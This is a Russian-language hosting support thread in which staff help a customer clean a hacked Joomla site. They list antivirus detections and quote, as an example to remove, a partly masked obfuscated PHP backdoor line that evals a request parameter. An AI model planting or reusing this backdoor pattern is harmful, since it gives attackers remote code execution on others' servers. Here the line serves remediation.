Хостинг от Ukr Line
личный кабинет
служба поддержки
Menu
Получи скидку
на хостинг
SALE
-50%
предложение ограничено

  хостинг
<< Назад       Восстановление правильной работы сайта

Вопрос: Доброе утро. Восстановите, пожалуйста, из бэкапа сайт ****.*.*. Взломали. Спасибо
Ответ:

Здравствуйте

сайт servicecenter***.in.ua работает. в чем заключется взлом?

Вопрос: Гугл прислал, что было внедрение через URL. И как рекомендацию предложил восстановить сайт из последней надежной резервной копии.
Ответ:

нужны более конкретные данные. тут ничего нет https://sitecheck.sucuri.net/results/servicecenter***.in.ua

сейчас мы проверим сайт антивирусом. потаму что

* не факт что он взломан

* в бекапе те же данные что и у Вас на сайте

 

 

Вопрос: В гугл вебмастере появились ошибки сканирования и там вот такие ссылки на страницы, которых у меня точно нет:http://****.*.***ipl******.htmlhttp://****.*.***.htmlИ написано ,что сайт взломан и на созданных страницах размещен контент, содержащий спам.
Ответ:

отчет сканирования

http://servicecenter***.in.ua/AI-BOLIT-REPORT-__-******-**-**-****_**-**.html

сейчас проверим бекап

Ответ:

сообщите когда google прислал Вам отчет

Вопрос: Отчет прислали вчера вечером, а ошибки указаны за ** и ** мая
Ответ:

наш бекап делался вчера ** мая

Ответ:

подозрительные скрипты у вас с ** мая

Ответ:

в логах антивируса еще более старые даты

/home/esma/servicecenter***/defender.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/defender.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/includes/defender.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/includes/defender.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/libraries/cms/toolbar/button/help.php: {HEX}php.mailer.Mzh.***.UNOFFICIAL FOUND
/home/esma/servicecenter***/style.php: {HEX}gzbase**.inject.unclassed.**.UNOFFICIAL FOUND

Вопрос: И более ранней версии нет?
Вопрос: Чем за **мая?
Ответ:

нет. сайт был заражен как минимум ** мая

мы сейчас удаллили часть вредоносных файлов. сейчас проведем повторное скнирование

Ответ:

http://****.*.*-******-**-**-*******-**.html

Вопрос: Спасибо огромное. Как Вы думаете это поможет избавиться от этого `контента`?
Ответ:

в файлах указаных в отчет удалите первую строку с вредносным кодом

например

<?php $swn**=`sotp_`;$djyq**= strtoupper ($swn**[*].$swn**[*] . $swn**[*].$swn**[*]. $swn**[*]); if(isset ( ${$djyq**}[ 'q***aac'] ) ){ eval (${$djyq** } ['q***aac'] ) ;} <?php

только  <?php  вконце строки оставляйте, это важно

Вопрос: А если в файле только одна строка и
Ответ:

тогда это вирус

Вопрос: А если в файле только одна строка, значит удалять все,кроме
Ответ:

Попробуйте сперва переименовать файл.

Вопрос: Почему-то не работает ни сайт, ни админка
Ответ:

что вы удалили?

Ответ:

почему вы удалили файл конфигурации?

Вопрос: строку в /****/*joomla*.php ,которая указана в отчете, перед этим ее сохранила, и уже вставила обратно
Вопрос: заработало!
Ответ:

вы удаляли файл конфтгурации. не нужно удлять не посмотрев что конкретно вы удаляете

Вопрос: понятно, буду смотреть, просто он был указан в отчете
Ответ:

http://servicecenter***.in.ua/AI-BOLIT-REPORT-__-******-**-**-****_**-**.html

от отчет.

файлы не удаляйте. удаляйте только код

 

Вопрос: я файл и не удаляла ,я удаляла строку в файле *.php, или код это что-то другое? я наверное что-то не поняла
Ответ:

нет. вы удалили файл configuration.php/ у вас его небыло

Вопрос: я его не трогала. я заходила только в файл *.php и все. как исчез файл *.php - понятия не имею.
Ответ:

будьте внимательны при работе. мы восстновили файлы. и просканировали. используйте последний отчет

Вопрос: Хорошо, спасибо, постараюсь разобраться
Ответ:


ok


<< Назад


© 2006 - 2021 UkrLine. All rights reserved
Закрыть
Ты уходишь??!
Протестируй БЕСПЛАТНО хостинг!!
Хочу бесплатно протестировать
Попробуй VPS
от $0.80
Хочу VPS
Не уходи